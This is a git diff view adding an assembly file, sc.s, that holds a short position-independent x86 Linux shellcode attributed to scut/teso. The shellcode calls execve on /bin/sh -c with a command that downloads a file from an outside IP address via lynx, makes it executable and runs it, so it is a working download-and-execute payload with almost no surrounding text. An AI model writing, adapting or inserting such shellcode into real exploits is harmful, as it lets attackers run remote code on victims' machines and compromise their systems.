diff options
Diffstat (limited to 'other/shell/sc.s')
| -rw-r--r-- | other/shell/sc.s | 51 |
1 files changed, 51 insertions, 0 deletions
diff --git a/other/shell/sc.s b/other/shell/sc.s new file mode 100644 index 0000000..6133b3e --- /dev/null +++ b/other/shell/sc.s | |||
| @@ -0,0 +1,51 @@ | |||
| 1 | /* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */ | ||
| 2 | |||
| 3 | .data | ||
| 4 | .globl cbegin | ||
| 5 | .globl cend | ||
| 6 | |||
| 7 | cbegin: | ||
| 8 | |||
| 9 | jmp jahead | ||
| 10 | |||
| 11 | docall: | ||
| 12 | pop %edi | ||
| 13 | |||
| 14 | movl %edi, %esp | ||
| 15 | not %sp /* build new stack frame */ | ||
| 16 | |||
| 17 | xorl %eax, %eax /* read number of arguments */ | ||
| 18 | movb (%edi), %al | ||
| 19 | inc %edi | ||
| 20 | |||
| 21 | decl1: push %edi | ||
| 22 | decl2: scasb /* search delim bytes */ | ||
| 23 | jnz decl2 | ||
| 24 | |||
| 25 | movb %ah, -1(%edi) | ||
| 26 | dec %eax | ||
| 27 | jnz decl1 | ||
| 28 | |||
| 29 | pop %ebx /* pathname */ | ||
| 30 | push %ebx | ||
| 31 | |||
| 32 | push %eax | ||
| 33 | pop %edx /* esp -= 4, edx = &envp[] = NULL */ | ||
| 34 | movl %esp, %ecx /* ecx = &argv[] */ | ||
| 35 | |||
| 36 | movb $11, %al | ||
| 37 | int $0x80 | ||
| 38 | |||
| 39 | jahead: call docall | ||
| 40 | |||
| 41 | /* reverse order arguments */ | ||
| 42 | .byte 0x03 /* number of arguments */ | ||
| 43 | .ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a" | ||
| 44 | .byte 0x03 | ||
| 45 | .ascii "-c" | ||
| 46 | .byte 0x02 | ||
| 47 | .ascii "/bin/sh" | ||
| 48 | .byte 0x01 | ||
| 49 | |||
| 50 | cend: | ||
| 51 | |||